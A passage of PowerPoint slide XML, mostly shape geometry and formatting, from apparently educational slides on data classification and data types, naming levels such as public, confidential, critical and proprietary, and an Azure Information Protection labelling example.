                  <a:pt x="4406122" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4389590" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4363942" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4330737" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4291535" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4247896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035678" y="2384298"/>
            <a:ext cx="198310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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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dian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72859" y="306451"/>
            <a:ext cx="350901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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classifications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08903" y="760476"/>
            <a:ext cx="4823459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17902" y="1882292"/>
            <a:ext cx="12213590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64460" marR="5080" indent="-2652395">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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classification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composing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schemas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identify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categorize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assets,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allowing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them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managed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throughout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information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life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cycle.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42260" y="5294376"/>
            <a:ext cx="11216640" cy="1988820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11216640" h="1988820">
                <a:moveTo>
                  <a:pt x="0" y="331470"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3595" y="282501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14038" y="235758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30817" y="191756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53416" y="151007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81323" y="114025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114025" y="81323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151007" y="53416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191756" y="30817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235758" y="14038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282501" y="3595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331469" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10885170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10934138" y="3595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10980881" y="14038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11024883" y="30817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11065632" y="53416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11102614" y="81323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11135316" y="114025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11163223" y="151007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11185822" y="191756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11202601" y="235758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11213044" y="282501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11216640" y="331470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11216640" y="1657350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11213044" y="1706318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11202601" y="1753061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11185822" y="1797063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11163223" y="1837812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11135316" y="1874794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11102614" y="1907496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11065632" y="1935403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11024883" y="1958002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10980881" y="1974781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10934138" y="1985224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10885170" y="1988820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331469" y="1988820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282501" y="1985224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235758" y="1974781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191756" y="1958002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151007" y="1935403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114025" y="1907496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81323" y="1874794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53416" y="1837812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30817" y="1797063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14038" y="1753061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3595" y="1706318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1657350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="331470"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="E3B36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151123" y="5854810"/>
            <a:ext cx="10593705" cy="79184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75"/>
              </a:spcBef>
            </a:pP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classification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schema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predictive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model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allows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one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more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tags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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pP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labels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assigned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each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asset.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79564" y="3328415"/>
            <a:ext cx="2542031" cy="2542031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72859" y="306451"/>
            <a:ext cx="350901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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classifications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08903" y="760476"/>
            <a:ext cx="4823459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442281" y="4180332"/>
            <a:ext cx="3372485" cy="2845435"/>
            <a:chOff x="6442281" y="4180332"/>
            <a:chExt cx="3372485" cy="2845435"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7326203" y="5699728"/>
              <a:ext cx="1604645" cy="1326515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1604645" h="1326515">
                  <a:moveTo>
                    <a:pt x="802050" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="9120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747440" y="36480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12237" y="1237265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1271637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6157" y="1299829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29007" y="1318900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66847" y="1325911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537253" y="1325911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575093" y="1318900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597943" y="1299829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604101" y="1271637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591863" y="1237265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856660" y="36480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831058" y="9120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802050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442281" y="5625084"/>
              <a:ext cx="1602740" cy="1325245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1602740" h="1325245">
                  <a:moveTo>
                    <a:pt x="1535858" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66722" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="6871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6143" y="25638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="53524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="87756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746680" y="1288922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772267" y="1315712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801163" y="1324641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829869" y="1315712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854884" y="1288922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589325" y="87756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602152" y="53524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596310" y="25638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1573609" y="6871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535858" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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210551" y="5625084"/>
              <a:ext cx="1604010" cy="1325245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1604009" h="1325245">
                  <a:moveTo>
                    <a:pt x="1536825" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66419" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28594" y="6871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5855" y="25638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="53524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12825" y="87756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748028" y="1288922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773043" y="1315712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801749" y="1324641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830645" y="1315712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856232" y="1288922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591435" y="87756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603672" y="53524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597515" y="25638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574665" y="6871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536825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326631" y="4180332"/>
              <a:ext cx="1603375" cy="1326515"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1603375" h="1326514">
                  <a:moveTo>
                    <a:pt x="1536825" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66419" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28594" y="7010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5855" y="26082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12825" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="747012" y="1289430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="772614" y="1316791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801622" y="1325911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830629" y="1316791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856232" y="1289430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590419" y="88645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603244" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597388" y="26082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574649" y="7010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536825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210551" y="4253833"/>
              <a:ext cx="1604010" cy="1325880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1604009" h="1325879">
                  <a:moveTo>
                    <a:pt x="801749" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773043" y="9167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748028" y="36099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12825" y="1236884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1271256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5855" y="1299448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28594" y="1318519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66419" y="1325530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1536825" y="1325530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574665" y="1318519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597515" y="1299448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603672" y="1271256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1591435" y="1236884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856232" y="36099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830645" y="8882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801749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442281" y="4253833"/>
              <a:ext cx="1602740" cy="1325880"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1602740" h="1325879">
                  <a:moveTo>
                    <a:pt x="801163" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="772267" y="8882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746680" y="36099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12239" y="1236884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1271256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6143" y="1299448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="1318519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66722" y="1325530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535858" y="1325530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1573609" y="1318519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1596310" y="1299448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602152" y="1271256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1589325" y="1236884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854884" y="36099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="829869" y="9167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="801163" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F8DE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005542" y="4671060"/>
              <a:ext cx="2244090" cy="1862455"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2244090" h="1862454">
                  <a:moveTo>
                    <a:pt x="1631473" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="612425" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586551" y="3865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538612" y="30218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12858" y="881506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="931037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3214" y="957087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522382" y="1812670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560974" y="1847881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612425" y="1862327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631473" y="1862327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1682924" y="1847881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721516" y="1812670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231040" y="979804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2243899" y="931037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240684" y="904795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721516" y="49656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1682924" y="14446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16314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2857245" y="6256147"/>
            <a:ext cx="285940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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Confidential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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25" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(secret)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03846" y="7643876"/>
            <a:ext cx="26993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45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Critical</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-140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30" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(top-secret)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282173" y="6050407"/>
            <a:ext cx="162750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70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Proprie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45" b="1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dirty="0" sz="2200" spc="95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ary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703702" y="1933193"/>
            <a:ext cx="10844530" cy="29298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Many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classification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concepts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based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required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level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confidentiality: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050">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Sensitive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000">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="490220">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2120"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Public</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-95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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>(unclassified)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7454265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Private</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-114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80" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-110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95" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>personal</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105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125" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>data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58100" y="5116067"/>
            <a:ext cx="926592" cy="926591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72859" y="306451"/>
            <a:ext cx="350901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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classifications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08903" y="760476"/>
            <a:ext cx="4823459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759708" y="2915411"/>
            <a:ext cx="8420100" cy="5238115"/>
            <a:chOff x="3759708" y="2915411"/>
            <a:chExt cx="8420100" cy="523811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59708" y="2915411"/>
              <a:ext cx="8420100" cy="523798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532364" y="2915411"/>
              <a:ext cx="1263650" cy="262255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1263650" h="262255">
                  <a:moveTo>
                    <a:pt x="1263396" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263396" y="262127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263396" y="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2261361" y="1882292"/>
            <a:ext cx="11957685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72690" marR="5080" indent="-2460625">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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screenshot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below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shows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use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Microsoft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Azure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Information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Protection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define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an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automatic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document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labelling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watermarking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policy.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36383" y="306451"/>
            <a:ext cx="198310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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-180">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types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01028" y="725423"/>
            <a:ext cx="2880360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158108" y="1756298"/>
            <a:ext cx="9934575" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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type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schema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applies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more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detailed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label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than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simple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 classification.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="3810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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Few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types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includes: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63011" y="4090415"/>
            <a:ext cx="11858625" cy="812800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11858625" h="812800">
                <a:moveTo>
                  <a:pt x="11722862" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="135381" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92577" y="6898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55412" y="26111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26111" y="55412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="92577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="135382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="676910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6898" y="719714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26111" y="756879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55412" y="786180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92577" y="805393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135381" y="812292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11722862" y="812292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11765666" y="805393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11802831" y="786180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11832132" y="756879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11851345" y="719714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11858244" y="676910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11858244" y="135382"/>
                </a:lnTo>
                <a:lnTo>
